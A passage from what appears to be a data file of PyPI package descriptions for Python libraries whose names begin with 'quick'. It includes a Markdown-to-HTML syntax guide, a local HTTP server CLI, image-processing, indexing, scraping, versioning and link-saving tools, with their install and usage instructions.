This is a level 1 unordered list item.This is another level 1 unordered list item.This is a level 2 unordered list item.This is another level 2 unordered list item.This is the third level 1 unordered list item.- This is a level 1 unordered list item.- This is another level 1 unordered list item.- This is a level 2 unordered list item.- This is a level 3 unordered list item.- This is the third level 1 unordered list item.
  • This is a level 1 unordered list item.
  • This is another level 1 unordered list item.
    • This is a level 2 unordered list item.
      • This is a level 3 unordered list item.
  • This is the third level 1 unordered list item.
This is a level 1 unordered list item.This is another level 1 unordered list item.This is a level 2 unordered list item.This is a level 3 unordered list item.This is the third level 1 unordered list item.At the moment, multiline items, such as multiline paragraphs, are not supported inside lists. This means each line is a new item. To add line breaks in list elements, use
tags directly.CodeTo denote text as code, add backticks (`) before and after a word or phrase.MarkdownHTMLOutput`This is some text denoted as code.`This is some text denoted as code.This is some text denoted as code.This is a `word` denoted as code.

This is a word denoted as code.

This is aworddenoted as code.Escaping backticksIf the word or phrase you want to denote as code includes one or more backticks, you can escape it by using double backticks (``) instead.MarkdownHTMLOutput``This is some text denoted as code.``This is some text denoted as code.This is some text denoted as code.This is a ``word`` denoted as code.

This is a word denoted as code.

This is aworddenoted as code.``This code contains `backticks`.``This code contains `backticks`.This code contains `backticks`.Backticks can also be escaped using a backslash (seeescaping characters).Code blocksAdd at least four spaces at the start of each line to denote a section as a code block.MarkdownHTMLOutputThisissometextdenotedascode.
Thisissometextdenotedascode.
Thisissometextdenotedascode.Horizontal RulesTo create a horizontal rule, add three or more asterisks (***), minus signs (---), or underscores (___) by themselves on a line.MarkdownHTMLOutput***
---
___
****
-----
______
LinksTo create a link, enclose the link name in square brackets ([]), followed by the URL enclosed in parentheses (()).MarkdownHTMLOutput[Click me!](https://github.com/ckc-dev/QuickHTML)
Click me!Click me!Go to [GitHub](https://github.com/)'s main page.

Go to GitHub's main page.

Go toGitHub's main page.Adding titles to linksA title can optionally be added to a link, it will appear as a tooltip when the link is hovered. To add a title, enclose it in either single (') or double (\") quotes after the URL.MarkdownHTMLOutput[Click me!](https://github.com/ckc-dev/QuickHTML \"Go to the main page of this repository.\")Click me!Click me!Go to [GitHub](https://github.com/ 'Click here to go to the main page of GitHub.

Go to GitHub's main page.

Go toGitHub's main page.Emails and URLsEmails and URLs can be quickly turned into links by being enclosed in angle brackets (<>).MarkdownHTMLOutputhttps://github.comhttps://github.comexample@email.addressexample@email.addressReference-style linksReference-style links are made up of two parts: the first part is the link reference, which is used inline with the text, and the second is the link definition, which is stored somewhere else in the document. This makes the document easier to read, especially when containing multiple long links.Formatting the referenceThe link reference is formatted using two sets of brackets ([]). The first set encloses the text which should appear as a link, and the second set encloses the label of a link definition.Formatting the definitionThe link definition is formatted using a set of brackets ([]) which encloses the label to this definition, immediately followed by a colon (:), followed by the link URL, which can optionally be enclosed in angle brackets (<>), and finally, optionally followed by a title, which must be enclosed in single quotes (''), double quotes (\"\") or parentheses (()).MarkdownHTMLOutput[Click me!][repository-url][repository-url]:https://github.com/ckc-dev/QuickHTMLClick me!Click me!Go to [GitHub][github-url]'s main page.[github-url]:

Go to GitHub's main page.

Go toGitHub's main page.[Click me!][repository-url][repository-url]: https://github.com/ckc-dev/QuickHTML \"Go to the main page of this repository.\"Click me!Click me!Go to [GitHub][github-url]'s main page.[github-url]: (Click here to go to the main page of GitHub.)

Go to GitHub's main page.

Go toGitHub's main page.ImagesTo add an image, use an exclamation mark (!), followed by the imagealttext enclosed in square brackets ([]), followed by the image's path or URL enclosed in parentheses (()). Titles can be optionally added to images, to add a title, enclose it in either single (') or double (\") quotes after the URL.MarkdownHTMLOutput![Tux](https://upload.wikimedia.org/wikipedia/commons/thumb/3/35/Tux.svg/256px-Tux.svg.png)\"Tux\"![Tux](https://upload.wikimedia.org/wikipedia/commons/thumb/3/35/Tux.svg/256px-Tux.svg.png \"lewing@isc.tamu.edu Larry Ewing and The GIMP, CC0, via Wikimedia Commons\")\"Tux\"Adding links to imagesTo add a link to an image, enclose the Markdown for the image in square brackets ([]), then follow with the link enclosed in parentheses (()).MarkdownHTMLOutput[![Tux](https://upload.wikimedia.org/wikipedia/commons/thumb/3/35/Tux.svg/256px-Tux.svg.png)](https://commons.wikimedia.org/wiki/File:Tux.svg)\"Tux\"[![Tux](https://upload.wikimedia.org/wikipedia/commons/thumb/3/35/Tux.svg/256px-Tux.svg.png)](https://commons.wikimedia.org/wiki/File:Tux.svg \"lewing@isc.tamu.edu Larry Ewing and The GIMP, CC0, via Wikimedia Commons\")\"Tux\"Escaping charactersAdd a backslash (\\) before a character to escape it, this is often used to display literal characters that would otherwise be used in Markdown syntax.MarkdownHTMLOutput\\# Without the backslash, this would be a heading.

# Without the backslash, this would be a heading

# Without the backslash, this would be a heading\\- Without the backslash, this would be an unordered list item.

- Without the backslash, this would be an unordered list item.

- Without the backslash, this would be an unordered list item.Escape sequencesYou can useescape sequenceswhen passing strings directly to theconvert()function.ContributingPull requests are welcome.Please open an issue to discuss what you'd like to change before making major changes.Please make sure to update and/or add appropriate tests when applicable.This project is licensed under theGPL-3.0 License."} +{"package": "quickhttp", "pacakge-description": "quickhttpquickhttpis a lightweight CLI that wraps Python'shttp.serverwith automatic port-finding and automatic shutdown after a configurable idle duration.FeaturesAutomatically finds and uses an available port.Has a keep-alive time after which it will shut down automatically if no requests are received, in case you forget about it.More secure default of127.0.0.1(localhost) instead of0.0.0.0.Easier to type and autocomplete thanpython -m http.server.InstallationYou can getquickhttpfromPyPI. I recommend usingpipxto manage Python command-line programs:pipxinstallquickhttpYou can also install normally using regularpip:pipinstallquickhttpRequires Python 3.7 or higher. For Python 3.6, installv1.0.0.Development VersionTo install the development version of this program, get it directly from GitHub.pipxinstallgit+https://github.com/jayqi/quickhttp.gitDocumentationquickhttp--helpUsage: quickhttp [OPTIONS] [DIRECTORY]\n\n Lightweight CLI that wraps Python's `http.server` with automatic port-\n finding and shutdown.\n\nArguments:\n [DIRECTORY] Directory to serve. [default: .]\n\nOptions:\n -t, --timeout TEXT Time to keep server alive for after most\n recent request. Accepts time expressions\n parsable by pytimeparse, such as '10m' or\n '10:00'. [default: 10m]\n\n -b, --bind TEXT Address to bind server to. '127.0.0.1' (or\n 'localhost') will only be accessible from\n this computer. '0.0.0.0' is all interfaces\n (IP addresses) on this computer, meaning\n that it can be accessible by other computers\n at your IP address. [default: 127.0.0.1]\n\n -p, --port INTEGER Port to use. If None (default), will\n automatically search for an open port using\n the other port-related options. If\n specified, ignores other port-related\n options.\n\n --port-range-min INTEGER Minimum of range to search for an open port.\n [default: 8000]\n\n --port-range-max INTEGER Maximum of range to search for an open port.\n [default: 8999]\n\n --port-max-tries INTEGER Maximum number of ports to check. [default:\n 50]\n\n --port-search-type [sequential|random]\n Type of search to use. [default:\n sequential]\n\n --version Show version and exit.\n --install-completion [bash|zsh|fish|powershell|pwsh]\n Install completion for the specified shell.\n --show-completion [bash|zsh|fish|powershell|pwsh]\n Show completion for the specified shell, to\n copy it or customize the installation.\n\n --help Show this message and exit.Why usequickhttp?python -m http.serveris a pain to type.quickhttpis shorter and can autocomplete. (But you can still dopython -m quickhttptoo if you really want to.)If you try startingpython -m http.serverand port 8000 is unavailable, you getOSError: [Errno 48] Address already in use. Then you have to choose another port and try again.quickhttpdeals with ports automatically for you.quickhttpwill automatically shutdown after the keep-alive time expires. This defaults to 10 minutes. I often start up an HTTP server to look at something, then open a new tab to continue doing things, and then I forget about the server.python -m http.serverdefaults to 0.0.0.0, which may make your server accessible to other people at your computer's IP address. This is a security vulnerability, but isn't necessarily obvious to people who just want to quickly serve some static files."} +{"package": "quick-https", "pacakge-description": "# Quick HTTPSExpanding on pythons Simple HTTP Server to include HTTPS## InstallationFrom PyPIpip install quick-https## RunningAfter installation, running the HTTPS server is as simple as:python3 -m https.server## Generating a certificateWhen the server is run for the first time, it will ask if you would like to\ngenerate a certificate to be used. If you say yes, a self-signed certificate\nwill be generated and stored in thehttps/certs/directory. This certificate\nwill be be used every time the server is started after that.If you ever want to regenerate certificate, start the server with the\u2013generateswitch. This will automatically generate a new certificate and\nreplace the old one inhttps/certs/."} +{"package": "quick-hull", "pacakge-description": "# A python library for the quick hull algorithm and visualization.### Authors\n#### - Nathan Martino\n#### - Tanvi Thummar"} +{"package": "quickim", "pacakge-description": "Client for QuickIM messenger"} +{"package": "quick-image", "pacakge-description": "Quick-Image: A simple image processing toolkit.Installationpip install quick-imageExamplesBasic Usagefromquick_imageimport*# quick_download_image(# pic_url='https://pixnio.com/free-images/2022/07/21/2022-07-21-08-38-18-1350x900.jpg',# save_path='flower.jpg')# quick_show_image(\"flower.jpg\")# quick_show_image_by_grayscale(\"flower.jpg\")# quick_show_image_by_grayscale2(\"flower.jpg\")# quick_show_image_gray(\"flower.jpg\")# quick_convert_12bit_gray(\"flower.jpg\",\"flower_12bit.jpg\")# quick_show_canny(\"flower.jpg\")# quick_replace_image_color(\"flower.jpg\",show=True)# quick_save_edges(\"flower.jpg\",\"flower_edges.jpg\",t=50)# quick_filter_by_dist(\"flower.jpg\",max_dist=1000)'''list_points,list_colors=quick_pick_image_color(\"flower.jpg\",\"points.csv\" ,\"colors.csv\")print(list_points)print(list_colors)'''# quick_remove_pix_color(\"flower.jpg\",target_color= [203,152,125],save_path='flower_removed_color.jpg')quick_remove_pix_color_by_range(\"flower.jpg\",lower_color=np.array([100,150,0]),upper_color=np.array([140,255,255]),show=True)Remove noisefromquick_imageimport*fromquick_image.quick_image_similarity_measuresimport*quick_remove_noise1(image_path=\"flower.jpg\",save_path=\"test4/output1.jpg\")# quick_remove_noise2(image_path=\"flower.jpg\",save_path=\"test4/output2.jpg\",min_size=5)score_ssim=ssim('flower.jpg','test4/output1.jpg')score_dvsim=dvsim('flower.jpg','test4/output1.jpg')print(score_ssim)print(score_dvsim)Estimate color similarityfromquick_imageimport*fromskimageimportio'''find image color similarity'''# Example 1:img_rgb=io.imread('flower.jpg')green=[203,152,125]s=get_pct_color(img_rgb,green,10)print(\"s=\",s)# Example 2:base=[35,103,239]test_color=[153,0,0]test_color1=[0,128,255]print(quick_color_similarity(base,test_color))print(quick_color_similarity(base,test_color1))Edge detectionfromquick_image.quick_image_processingimport*importtimetime_cost={}if__name__==\"__main__\":image_path=\"flower.jpg\"# coords = load_polygon_file(f'datasets/areas/{gender}/{body_part}_polygon_area.pickle')file_name=\"flower.jpg\"start=time.time()# Using Canny algorithm (86)detect_edges(img_path=image_path,save_path='test3_output/'+file_name)time1=time.time()# Using Canny algorithm with polygonsdetect_edges_with_polygon(img_path=image_path,save_path='test3_output/'+file_name)time2=time.time()# Using single-color isolate algorithmisolate_image(image_path=image_path,save_path='test3_output/'+file_name)time3=time.time()# Using multi-color isolate algorithmisolate_image2(image_path=image_path,save_main_color='test3_output/'+file_name,save_path='test3_output/'+file_name)time4=time.time()time_cost[\"canny\"]=time1-starttime_cost[\"canny_polygon\"]=time2-time1time_cost[\"isolate1\"]=time3-time2time_cost[\"isolate2\"]=time4-time3print(\"Method\\tTime cost\")forkintime_cost:print(f\"{k}\\t{round(time_cost[k],4)}\")LicenseThequick-imagetoolkit is provided byDonghua Chenwith MIT License."} +{"package": "quickimport", "pacakge-description": "The module quickimport provides an improved importer for python. If\nyou ever started a Python application from a lame file server (like\na CIFS server) you know the problem of long startup times. The quickimport\nimporter uses the pep 302 import hooks to reduce the number of\nfailing stat system calls for each loaded module.For Python 2.7. May work with earlier versions too.Git repository: git://github.com/akruis/quickimport.git"} +{"package": "quickim-server", "pacakge-description": "Server for QuickIM messenger"} +{"package": "quickindex", "pacakge-description": "quickindexA simple way to re-index json data in pythonExample UsageInputfrom quickindex import TreeIndex\ndata_list = [\n {\n \"first_name\": \"Davina\",\n \"last_name\": \"Emmy\",\n \"age\": 25\n },\n {\n \"first_name\": \"Kondwani\",\n \"last_name\": \"Busch\",\n \"age\": 25\n },\n {\n \"first_name\": \"Betty\",\n \"last_name\": \"Shannon\",\n \"age\": 32\n },\n {\n \"first_name\": \"Claude\",\n \"last_name\": \"Shannon\",\n \"age\": 38\n }\n]\nage_index = TreeIndex(lambda x: (x[\"age\"], x[\"last_name\"]), lambda x: x[\"first_name\"])\nage_index.add_list(data_list)\nprint(age_index.as_dict())Output{\n 25: {\n 'Emmy': ['Davina'], \n 'Busch': ['Kondwani']\n }, \n 32: {\n 'Shannon': ['Betty']\n }, \n 38: {\n 'Shannon': ['Claude']\n }\n}Inputfrom quickindex import FlatIndex\ndata_list = [\n {\n \"first_name\": \"Davina\",\n \"last_name\": \"Emmy\",\n \"age\": 25\n },\n {\n \"first_name\": \"Kondwani\",\n \"last_name\": \"Busch\",\n \"age\": 25\n },\n {\n \"first_name\": \"Betty\",\n \"last_name\": \"Shannon\",\n \"age\": 32\n },\n {\n \"first_name\": \"Claude\",\n \"last_name\": \"Shannon\",\n \"age\": 38\n }\n]\nage_index = FlatIndex(lambda x: (x[\"age\"], x[\"last_name\"]), lambda x: x[\"first_name\"])\nage_index.add_list(data_list)\nprint(age_index.as_dict())Output{\n (25, 'Emmy'): ['Davina'], \n (25, 'Busch'): ['Kondwani'], \n (32, 'Shannon'): ['Betty'], \n (38, 'Shannon'): ['Claude']\n}"} +{"package": "quickinfo", "pacakge-description": "QuickInfoThis is the library that you've all been searching for, it's built for developers and allows for a variety of web scraping tasks like accessing featured snippets, summaries and wikipedia articles of google webpages. It's built on the web scraping module, selenium.How to useUsing this module is very easy. Import it by saying -import quickinfoto import the class directly -from quickinfo import QuickScrapeThe first step is to create an instance of the class -p = quickinfo.QuickScrape()\n# OR\np = QuickScrape()QuickScrape takes a parameter and that is the path of your chromedriver.exe file, by default, the path set is \"C:\\Program Files (x86)\\chromedriver.exe\". Please change this attribute if your chromedriver file is in a different path.The next step is to run the process method. It takes an attribute and that is headless. By default, headless is set to True. If set to boolean True, the process of opening the webpage will take place in the background. If set to boolean False, then you can see the process take place.p.process() # Takes arguement True or FalseRemember to run this process method before you use any webscraping functions.\nThis module has three basic methods, they are -wiki_article = p.wiki_article(query)\nsummary_para = p.summary_para(query)\nfeatured_snippet = p.featured_snippet(query)\n\nprint(wiki_article)\nprint(summary_para)\nprint(featured_snippet)Please note that sometimes a summary_para or a wiki_article or a featured_snippet may not be available, hence it will return None.\nIn the end of your program it is very important to say p.end(). This closes the driver and ends the instance.p.end()Example codefrom quickinfo import QuickScrape\np = QuickScrape() # creates instance\np.process() # runs process in the background\n\nquery = \"programming\"\n\nwiki_article = p.wiki_article(query) # gets wiki article for programming\nsummary_para = p.summary_para(query) # gets summary para for programming\nfeatured_snippet = p.featured_snippet(query) # gets featured snippet for programming\n\nprint(wiki_article)\nprint(summary_para)\nprint(featured_snippet)\n\np.end()OutputDescription\nComputer programming is the process of designing and building an executable computer program to accomplish a specific computing result or to perform a specific task. Wikipedia\nProgramming is the process of creating a set of instructions that tell a computer how to perform a task. Programming can be done using a variety of computer programming languages, such as JavaScript, Python, and C++.\nFeatured snippet from the web\nProgramming is the process of creating a set of instructions that tell a computer how to perform a task. Programming can be done using a variety of computer programming languages, such as JavaScript, Python, and C++.\n\nWhat is Programming? (video) | Khan Academy\nhttps://www.khanacademy.org \u203a ... \u203a Intro to programmingBuilt byDarkSkyProgrammers -The programmers of this team are Arya Prabhu and Ananthram Vijayaraj.Team logo"} +{"package": "quickinit", "pacakge-description": "quickinitquickinit is a command line tool to quickly generate project structures for different programming languages and frameworks.FeaturesGenerate project structure for:PythonGolangVanilla Web (HTML, CSS, JS)NextJSRustOpen generated project in VSCodeUsagepip install quickinitRun the script and answer the prompts:Choose the programming language/framework stackEnter a project nameThe tool will generate the basic project structure for you.After generation, the project will be opened in VSCode automatically (if available on your system).Adding New TemplatesTo add additional templates:Add a template folder undertemplates/Updatecreate_[language]_project_structure()to copy or generate the new templateUpdate the main prompt to include the new optionUpdate the main match statement to call the new project structure generation functionOr you can open an issue on the repo.To DoAdd testingImprove error handlingAdd option to git init generated projectExpand available templatesLicenseThis project is open source and available under theMIT License."} +{"package": "quickirc", "pacakge-description": "No description available on PyPI."} +{"package": "quickjs", "pacakge-description": "Python wrapper aroundhttps://bellard.org/quickjs/.Translates types likestr,float,bool,list,dictand combinations\nthereof to and from Javascript.QuickJS is currently thread-hostile, so this wrapper makes sure that all calls\nto the same JS runtime comes from the same thead."} +{"package": "quickjson", "pacakge-description": "Quick JsonThis Package will help you deal with json files more quickly and efficiently.How to Install it?On Windows:pip install quickjsonOn Linux:sudo pip3 install quickjsonHow to Use it?Initializing The Packagefrom quickjson.quickjson import QuickJson\n\njsonhelper = QuickJson('filename.json') # Provide the Name of the Json File while InitializingThis will initialize QuickJson Class to jsonhelper variable and now you can use it's all functions using the variable.Reading Data From Json Filesprint(jsonhelper.read_json_file())This will print the contents of json file in the console.Writing Data to Json FIlesdata = {\"elite\": \"john\"} # Sample Dictionary\n\njsohelper.write_json_file(data) # Parsing the dictionaryThis will write the dictionary parsed in the json file.Inserting Element to a List present inside json fileIf you want to insert an item to a list present inside json file then use this codejsonhelper.write_list_json_file('listname', 'element')This will insert the element into the specific listFor More Information, VisitDocumentation."} +{"package": "quickjsonparser", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "quickjsonrpc", "pacakge-description": "No description available on PyPI."} +{"package": "quickkey", "pacakge-description": "QuickKey - VIM-like Keyboard Productivity Without the Complication!Install via pippip install quickkey, then runquickkeyto start!"} +{"package": "quickkeys", "pacakge-description": "quickkeysThe quickkeys package provides a simple and versatile tool for generating secure passwords and one-time passwords (OTPs). With this package, you can easily generate passwords and OTPs of varying lengths and complexities to enhance the security of your applications.FeaturesPassword Generation:Generate passwords with a customizable number of letters, symbols, and numbers.Choose from predefined functions to generate passwords of specific lengths:four_digit_password(): Generates a 4-digit password with 2 letters, 1 symbol, and 1 number.six_digit_password(): Generates a 6-digit password with 4 letters, 1 symbol, and 1 number.eight_digit_password(): Generates an 8-digit password with 4 letters, 2 symbols, and 2 numbers.strong_password(): Generates a strong password with a random length between 8 and 10 characters, including a mix of letters, symbols, and numbers.OTP Generation:Generate one-time passwords (OTPs) with a customizable number of digits.Choose from predefined functions to generate OTPs of specific lengths:four_digit_otp(): Generates a 4-digit OTP.six_digit_otp(): Generates a 6-digit OTP.Usage# Example usage for generating passwords\nimport quickkeys\n\n# Generate a strong password\npassword = quickkeys.strong_password()\nprint(\"Generated Strong Password:\", password)\n\n# Generate a 6-digit OTP\notp = quickkeys.six_digit_otp()\nprint(\"Generated OTP:\", otp)Installationpip install quickkeys"} +{"package": "quick-knn", "pacakge-description": "Quick KnnLocality Sensitive hash functionsUses MinHash to approximate Jaccard Similarity and Random Hyperplanes to approximate Cosine similarity."} +{"package": "quicklab", "pacakge-description": "quicklabStart Jupyter Lab sessions on the cloudFeaturesVM creationJupyter on DockerSSL certificates (ZeroSSL & Caddy)Volumes management (Creation, Resizing, deletion, formating, etc)DNS A record creation (Google, Cloudflare)Automatic shutdown by inactivity (by Jupyter)GPU Provisioning (nvidia-smi installation, docker configuration, etc)Linux image creation (Packer)Entities types for autocompletionLogging into cloud provider log serviceOnly Google Cloud Platform supported for now, but relatively easy to add new\ncloud providers.UsageFor users:QuickstartFor administrators:DeployImagesVolumesPermissionsAcknowledgmentsOriginal work fromLabMachineLicenseWork licensed under MPL 2.0. SeeLICENSEfor more."} +{"package": "quickLabel", "pacakge-description": "UNKNOWN"} +{"package": "quickle", "pacakge-description": "quickleis a fast and small serialization format for a subset of Python\ntypes. It\u2019s based off ofPickle, but includes several\noptimizations and extensions to provide improved performance and security. For\nsupported types, serializing a message withquicklecan be~2-10x fasterthan usingpickle.Seethe documentationfor more\ninformation.LICENSENew BSD. See theLicense File."} +{"package": "quicklearn", "pacakge-description": "quickLearnTools for quick machine learning"} +{"package": "quicklearning", "pacakge-description": "quicklearningInstalationTo install run the following:pipinstallquicklearningautomodel usageFirst importfromquicklearning.classification.imageimportquickthen run something likemodel=quick.fit(10,['cat','dog'],verbose=True)This will create a dataset of images from the image search results fromDuckDuckGo, then create a new model based on a pretained model and lastly it will do the actual training of the model."} +{"package": "quicklib", "pacakge-description": "Build hassle-free setup scripts for your python libraries, with\npractical versioning, requirements specification, and more (to come).InstallationInstall using:pip install quicklibOr clone this project\u2019srepoand run:python setup.py installCreating librariesTL;DR- runpython-mquicklib.bootstrapin a new folder and\nanswer some questions, and you\u2019re good to go coding. Look atexamplelibraryfor an example created with this bootstrap process.Also, your library needs to be in a git-managed folder, and needs at\nleast one numericmajor.minortag in your current history.If you have no version tags yet, create the first one now and push it:git tag -a 0.1 -m \"first version tag: 0.1\"\ngit push origin 0.1File structureThe recommended library file structure is something like:mylibrary/\n |----- setup.py\n | | OR\n | --- quicklib_setup.yml\n |-- README.md\n |-- [requirements.txt]\n mypackage/\n |-- __init__.py\n |-- version.py\n |-- module1.py\n |-- module2.py\n |-- subpackage/\n |-- __init__.py\n |-- module3.pyIf you want to include more than one top-level package in your library,\nplace additional ones next tomypackage.For a deeper dive into recommended structure and other possible options,\ncheck outStructuring Your Projectat the Hitchhiker\u2019s Guide to\nPython.Setup scriptFor an examplesetup.pyfile seeexamplelibrary\u2019s setup.py.The setup script must include this fixed stub copy-pasted verbatim:# -------- quicklib direct/bundled import, copy pasted --------------------------------------------importsysas_sys,globas_glob,osas_osis_packaging=not_os.path.exists(\"PKG-INFO\")ifis_packaging:importquicklibelse:zips=_glob.glob(\"quicklib_incorporated.*.zip\")iflen(zips)!=1:raiseException(\"expected exactly one incorporated quicklib zip but found%s\"%(zips,))_sys.path.insert(0,zips[0]);importquicklib;_sys.path.pop(0)# -------------------------------------------------------------------------------------------------After that, where you would usually callsetuptools.setup(...), callquicklib.setup(...)instead:quicklib.setup(name='examplelibrary',url=\"https://example.com/\",author='ACME Inc.',author_email='user@example.com',description='examplelibrary: a library to demonstrate how quicklib is used to quickly setup python libraries',license='Copyright ACME Inc.',platforms='any',classifiers=['Programming Language :: Python','Development Status :: 4 - Beta','Natural Language :: English','Intended Audience :: Developers','Operating System :: OS Independent','Topic :: Software Development :: Libraries :: Python Modules',],version_module_paths=[\"examplepackage/version.py\",],)Most parameters are exactly the same as they are insetuptools.Additional parameters:version_module_paths- see details in \u201cVersioning\u201d belowModified parameter defaults:ifpackagesis not given,find_packages()is used\nautomatically to discover packages under your library\u2019s top\ndirectory.YAML-based setupThe easiest way for simple libraries is to provide all necessary details\nin a YAML file. This is essentially the same as creating a setup.py that\nuses the YAML dictionary as its kwargs.For example, create aquicklib_setup.ymlfile at the root of your\nproject:setup:\n name: mylibrary\n description: a library for doing some stuff\n version: 1.0And runquicklib-setupsdist(instead ofpython setup.py sdist)\nto create the library package.You can alsoincludeadditional files of a similar format (overriding each other in order of appearance), e.g. to use as common template of values:# mylib_setup.yml\ninclude:\n - ../common_properties.yml\nsetup:\n name: mylibrary\n\n# common_properties.yml\nsetup:\n author: ACME Inc.\n author_email: user@example.comFor additional parameters, see the rest of this documentation and\nprovide parameters toquicklib.setup(...)as values under thesetupdictionary in yourquicklib_setup.ymlfile.Take a look at theminimal example libraryfor usage example.Setup script in non-standard locationIt is possible to build libraries with quicklib from setup scripts\nother than \u201ctop level setup.py\u201d. This allows building more than one\nlibrary (or variants of a single library) from a single repository.Look atexamplelibrary2for two such example library variants built\nfrom the same sources.Just place your setup code in any folder and run it the same way as\nusual, e.g.:python my_other_setup.py sdist bdist_wheelNote that if you want to have aMANIFEST.infile to go with the\nscript, you can put it alongside it and using the same base name,\ne.g.:...\n|-- my_other_setup.py\n|-- my_other_setup.MANIFEST.in\n...If no such alternative MANIFEST.in file is present and a top-level\nMANIFEST.in exists, it will be used as usual.VersioningThe build process automatically sets your library version based on the\ngit log and tags. This version information is applied to the built\nlibrary and can later be programmatically queried by library package\nusers.version value inferenceItgit-describes theHEADsearching for the latest\nannotated (!) tag with amajor.minorlabelIf the tag is placed directly on the currentHEADthen this is\nthe version labelotherwise, a.microsuffix is added denoting the number of\ncommits between the tag andHEADFinally, if there are any local modifications, a.dirtysuffix is\naddedadding version info to your packagesAdd aversion.pystub file under any of your top-level packages with\nthis fixed template:# quicklib version boilerplateDEV_VERSION=\"0.0.0.dev0\"__version__=DEV_VERSIONIn addition, tellsetup.pywhere to find those files:quicklib.setup(version_module_paths=[\"mypackage/version.py\",# ... you can specify more than one],)Then, your users can programmatically query this version value by running\ne.g.:importmypackageprint(mypackage.version.__version__)versioning multiple packagesIf your library contains multiple top-level packages, aversion.pyfile should usually be added under each of them. This allows your\nlibrary users to ask about the version of each of your individual\npackages while being agnostic to the fact that they come from the same\nlibrary. If you find this confusing, you may want to stick to one\ntop-level package per library.Choosing packages to includeThe default behavior callssetuptools.find_packages()and typically collects all top-level packages found. To disable this behavior, providepackagesyourself.Another alternative is to provide a list of top-level package names in thetop_packagesargument. In this case,find_packages()is called when only these top-level packages are included in the search.RequirementsTo add requirements to your library, add them in arequirements.txtfile at the project root.Use syntax such as:numpy\npandas==0.18.1\nyarg~=0.1.1Freezing requirementsSometimes you want to hardcode the versions of your dependencies. This\nhelps provide your users the exact same configuration you built and\ntested with. To avoid having to manually update those numbers, you can\nkeep your requirements specified as usual but activate \u201crequirement\nfreezing\u201d.Do this by passingfreeze_requirements=Trueto thequicklib.setup(...)call insetup.py. At packaging time, the\navailable versions will be retrieved frompypi.python.org, and the\nlatest matching version will be hardcoded as the requirement.Note: if your library depends on a hardcodeddep==1.0butdepdid not hardcode its dependencies, your users might get different\npackages. To get around that you can specify your requirements\u2019\nrequirements as your own requirements. Automatically fetching this\ninformation is on this library\u2019s roadmap.when not using pypi.python.orgIf your dependency libraries come from another package repository, you\ncan specify another address or even provide your own plugin to retrieve\ninformation from such a server.To do this, provide a dictionary of options infreeze_requirements:quicklib.setup(# ...freeze_requirements={# alternative pypi server address'pypi_server':'https://my-private-pypi.com/packages/',# when given, this is imported at packaging time and used to find package versions.# see quicklib/requirements.py for the StandardPypiServerPlugin default plugin, and follow its interface.'server_plugin':'foo.bar:baz()',})"} +{"package": "quicklime", "pacakge-description": "No description available on PyPI."} +{"package": "quicklink", "pacakge-description": "quicklinkQuicklink is a simple command line tool to save a web URL as a file on your system. This file is a.urlfile that opens in the default browser when double-clicked.Installation$pipinstallquicklinkUsage$cd[directory]$quicklink[filename][url]Example$quicklinkquicklink_githubhttps://github.com/CarlJKurtz/quicklinkThis will create a file calledquicklink_github.urlin the current directory that opens this GitHub page in the default browser.AboutSupportQuicklink is entirely free of charge for both commercial and private use! But code doesn't write itself \u2014 so please consider sharing this project, or even support the project by sponsoring it on GitHub if you got some use out of it! \ud83e\udd18\ud83c\udffcCopyrightCopyright (c) 2023, Carl J. Kurtz. (SeeLICENSEfor more information)"} +{"package": "quicklinks", "pacakge-description": "QuicklinksQuicklinks is a short command-line script that allows you to quickly switch to a a pre-configured link.On OSx, this would be the same thing as doing the following:ql google->open https://google.comRequirementsThe only requirement for this application is Python 3Usage and InstallationRun the following script:pipinstallquicklinksCreate a.quicklinksfile in your user root:touch~/.quicklinksPopulate the.quicklinksfile like the following:{your-link-key}:{your-link-value}Example:google:https://google.com\nwiki:https://wikipedia.comRun the programqlwikiAnd you will be redirected to your browser of choice, opening your linkExperimental new features!Try out the browser extensions with Quicklinks server -DocumentationContributingFork this code and open a PR, all code is welcome as long as it follows the code of conduct!To run the application locally, navigate tocli/and run the commandpython ./quicklinks.pyCreditsQuicklinks was inspired by my use ofalias ql=\"open\"as well as the very coolGoLinks, check them out if you want the same thing as quicklinks but in your browser itself!"} +{"package": "quicklite", "pacakge-description": "python-dbLight weight database for python, with a simple API and a simple file format.\nit is not meant to be a full featured database, but rather a simple way to store data in a file.\nit's written in python, and is compatible with python 3.6 and above.FeaturesSimple APIColorful outputEasy to useCLI interfaceOpen sourceDocumentationThe documentation is available atnot yet availableInstallationYou can install python-db using pip:pip install python-dbUsageTo use python-db, you need to import it:from python_db import Database"} +{"package": "quickload", "pacakge-description": "That\u2019s my tradewatch package\nimport tradewatch as tw\ntw.get_atts(\u201cBRB lalka\u201d)\n#{\u201csearch_request\u201d: \u201cBarbie Lalka\u201d, \u201cStan\u201d: \u201cNowy\u201d, \u201cFaktura\u201d: \u201cWystawiam faktur\\u0119 VAT\u201d, \u201cSeria\u201d: \u201cMade To Move\u201d, \u201cMarka\u201d: \u201cBarbie\u201d, \u201cBohater\u201d: \u201cBarbie\u201d, \u201cWiek dziecka\u201d: \u201c3 lata +\u201d, \u201cP\\u0142e\\u0107\u201d: \u201cCh\\u0142opcy, Dziewczynki\u201d, \u201cMateria\\u0142\u201d: \u201cPlastik, Tkanina\u201d, \u201cquery\u201d: \u201cBarbie Lalka\u201d}"} +{"package": "quicklock", "pacakge-description": "A simple Python resource lock to ensure only one process at a time is\noperating with a particular resource.Singleton UsageSingleton creates a file containing process information to ensure that\nthe process that created the lock is still alive. The default location\nis in the.lockdirectory in the current working directory. If this\ndirectory does not exist,singletonwill create it automatically.Simple usage:fromquicklockimportsingletonsingleton('my-process')# This will ensure that only one of these is running at once# The lock is released when the process that created the lock# exits (successfully or quits unexpectedly)# Intensive processing hereSpecifying the lock directory:fromquicklockimportsingletonsingleton('my-process',dirname='/var/lock')# Now all lock files will be written to# /var/lock instead# Intensive processing hereContributingPlease feel free to create issues and submit pull requests. I want to\nkeep this library as a simple collection of useful locking-related\nutilities.LicenseThe license is MIT, see the attachedLICENSEfile for more\ninformation."} +{"package": "quicklock3", "pacakge-description": "No description available on PyPI."} +{"package": "quicklog", "pacakge-description": "QuickLog is a small logging utility."} +{"package": "quick-log", "pacakge-description": "it's so easy to use"} +{"package": "quick-logger", "pacakge-description": "quick_loggerA simple interface for the standard Python logging library.AboutThis is a very simple package designed to setup a logger in one line and allow logging to it with ease.NoteI wrote this package when I was still in school. It's really no easier than just usinglogger..However, theinit_loggermethod may still be of some use. I've updated it such 